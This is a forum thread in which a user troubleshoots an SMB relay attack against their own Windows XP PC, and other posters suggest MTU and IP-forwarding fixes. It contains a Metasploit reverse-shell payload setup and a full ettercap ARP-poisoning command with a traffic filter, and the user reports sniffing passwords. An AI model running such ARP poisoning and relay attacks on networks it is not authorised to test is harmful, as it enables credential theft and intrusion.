[SOLVED]Issues with SMB relay exploit (error from ettercap)
Hey guys... Hope im not enfuriating anyone with my more or less noobish request, but i simply cannot find a solution anywhere (neither searching the forums, googling, or browsing the ettercap forum)... Im trying to get into my stationary pc (fully updated xp sp3 pro) while being on the same network (ofc).
I used the smb.filter posted on the forum (with the ip modified to fit).
starting metasploit and using these settings:
payload = windows/shell_reverse_tcp
LHOST = my ip
SMBHOST = my stationary ("victim ip")
then i run ettercap using:
sudo ettercap -T -q -F smb.ef -M ARP /"victim ip"/ // -P autoadd -i ra0
at this point everything looks fine... ettercap adds the host and starts the ARP poisoning...
The problem occurs when i then proceed to enter a website on my "victim pc" - the browser freezes, or atleast stands still working on loading the website...
at this point my ettercap konsole displays a lot of "Filter Ran." and some "zapped Accept-Encoding!" but inbetween these i get the error:
"SEND L3 ERROR: 980 byte packet (0800:06) destined to "VICTIM IP" was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
Its looks like im incapable of forwarding packets but i do not understand why - i hope someone is capable of assisting me in this matter
Good friend of the forums
if you go ifconfig ra0 , what does the mtu say its at. try ifconfig ra0 mtu 1500
or echo 1 > /proc/sys/net/ipv4/ip_forward
Hey, first of all thanks for the answer... i've already tried both the echo 1 command and editing etter.conf to forward (removing the # as others on the forum have suggested)... just tried ur suggestion with the mtu 1500 (mine was just below 600 as default) but unfortunately it didnt do any difference..
Originally Posted by compaq
couldnt it be something in my router configuration?
WOOP! got it working with my other wireless card and some further adjustments... anyway, its solved! Didnt get root on my windows box though... but got passwords sniffed and i was deffo able to send packets.. anyway.. !
Hey where is the filter?
I am having trouble locating it, can u please drop a link